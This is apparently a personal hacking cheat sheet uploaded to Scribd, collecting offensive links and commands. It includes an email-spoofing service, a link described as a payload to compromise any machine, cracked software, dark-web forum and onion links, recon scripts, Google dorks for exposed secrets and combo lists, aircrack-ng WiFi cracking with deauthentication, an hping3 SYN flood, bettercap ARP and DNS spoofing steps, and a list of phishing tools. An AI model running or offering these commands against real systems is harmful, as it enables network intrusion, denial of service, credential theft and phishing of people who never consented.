0% found this document useful (0 votes)
301 views

All Links

Uploaded by

gitikig436
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
301 views

All Links

Uploaded by

gitikig436
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 4

https://emkei.

cz/ = this link is used to generate email and you can send it to any
one

https://mega.nz/file/uKBijYjI#ZPZ-MarMRwB3p-weZZb3cv5xxrg5v6zFF0XSafDKyZ0
= sim info

https://free4pc.org/morphvox-pro-crack/ = voice
changer

https://drive.google.com/file/d/1LrldFXBGTn2xiq2HwcR2aw5MrdJKTOKS/view
= payload to compromise any machine

...................................................................................
...........................................................................

Famous Irish investigator twitter.com/osintme compiled a list of 100+ hacker,


cracker, carder & cyber criminal forums.

It comes in handy when investigating cybersecurity incidents, as well as just for


educational purposes.

https://osintme.com/index.php/2022/07/14/list-of-60-hacker-cracker-carder-cyber-
criminal-forums-for-investigators/ = all the forum available on this link

#osint #cybersecurity
* More darkweb forums
(1) cracked.io (2) breached.io (3) 0X00 (4) rio.net (5) youhack.io (6)
hackforum.net
...................................................................................
.............................................................................

http://xmh57jrknzkhv6y3ls3ubitzfqnkrwxhopf5aygthi7d6rplyvk3noyd.onion/cgi-bin/
omega/omega
http://torch2cjfpa4gwrzsghfd2g6nebckghjkx3bn6xyw6capgj2nqemveqd.onion/
https://juhanurmihxlp77nkq76byazcldy2hlmovfu2epvl5ankdibsot4csyd.onion
= All darkweb links
https://juhanurmihxlp77nkq76byazcldy2hlmovfu2epvl5ankdibsot4csyd.onio/

* Go to tor browser and search hiddenwiki.org and u will get all darkweb links

...................................................................................
.................................................................................

#!/bin/bash

read -p "Enter the domain: " domain

# Function to run Nmap


run_nmap() {
echo "Scanning $1 with Nmap..."
nmap -sC -sV $1
sleep 5
}

# Function to run ffuf for directory brute force


run_ffuf() {
echo "Running ffuf for directory brute force on $1..."
ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -mc 200 -u
http://$1/FUZZ = Bash script for tools automation
sleep 5
}

# Function to run Amass


run_amass() {
echo "Running Amass on $1..."
amass enum -ip -active -d $1
sleep 5
}

run_nmap $domain
run_ffuf $domain
run_amass $domain

...................................................................................
.....................................................................

#!/bin/bash

# Prompt the user for the target domain


echo "Enter the target domain :"
read target

echo "nmap version scan..."


nmap -sV $target
sleep 5

echo "subdomain scan start..."


subfinder -d https://$target = Bash script for tool
automation
sleep 5

echo "dirb scan .."


dirb https://$target
sleep 5

echo "nikto scan..."


nikto -h $target
sleep 5
...................................................................................
...........................................................................

[20/11, 22:34] null: 🎭 Google Dorks for Bug Bounty by TheLevel8 💠

A list of Google Dorks for Bug Bounty, Web Application Security, and Pentesting👇

🔸 Broad domain search w/ negative search

▶ site:example.com -www-shop-share -ir -mfa

🔸 PHP extension w/ parameters

▶ site:example.com ext: php inurl:?


🔸Disclosed XSS and Open Redirects

▶ site:openbugbounty.org inurl: reports intext: "example.com"

🔸 Juicy Extensions

▶ site: "example[.]com" ext:log | ext:txt | ext:conf | ext: cnf | ext:ini |

ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git |

= Google Dorking
ext:svn | ext:htpasswd | ext: htaccess

🔸 XSS prone parameters

▶ inurl:q= | inurl:s= | inurl: search= | inurl:query= | inurl: keyword= |

inurl:lang= inurl:& site:example.com

🔸 Open Redirect prone parameters

▶ inurl:url= | inurl: return= | inurl: next= | inurl: redirect= | inurl:redir= |

inurl:ret= | inurl: r2= | inurl:page= inurl:& inurl:http site:example.com

Enjoy and give reacts✅


[20/11, 22:35] null: ❤ HOW TO SEARCH ANY THREAD ON ANONFILES USING GOOGLE DORKS❤

👍SIMPLE : site:"anonfile.com" "<search term>"

👄 EXAMPLE : site:"anonfile.com" "<combos>"


site:"anonfile.com" "<giftcards>"

🔸🔸🔸🔸🔸🔸🔸🔸
Enjoy and give Reacts🤩
...................................................................................
...........................................................................

* WIFI HACKING
step 1 = sudo airmon-ng check kill
step 2 = sudo airmon-ng start wlan0
step 3 = iwconfig
step 4 = sudo airodump-ng wlan0
step 5 = sudo airodump-ng -w filename -c 5 --bssid (bssid) wlan0
step 6 = sudo aireplay-ng --deauth 0 -a (bssid) wlan0
step 7 = sudo wireshark filename = check eapol packets
step 8 = sudo aircrack-ng filename -w /usr/share/wordlist/rockyou.txt

...................................................................................
......................................................................
DOS ATTACK

sudo hping3 -S --flood -v (domain) or (ip)


...................................................................................
....................................................................
MAN IN THE MIDDLE ATTACHL (BETTERCAP)

step 1 = net.probe on
step 2 = net.show
step 3 = set arp.sppof (give ip)
step 4 = arp.spoof on
step 5 = net.sniff on //everthing i will do on my machine will be visible
step 6 = net.sniif off
step 7 = clear

* For redirecting your own link


step 1 = set dns.spoof.domains myamazon.com
step 2 = service apache2 start //open another terminal and type this command to
generate empty website on our network
step 3 = dns.spoof on
step 4 = type my amazon.com on google and you will be redirected to the empty
website you set

...................................................................................
...................................................................

Tools
Aort
reaconftw
spider
seeker
XSS (sql)
net cat
maxphisher
zphiser
camphish
steghide
dnsrecon
dmitry
dnsenum
amass enum

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy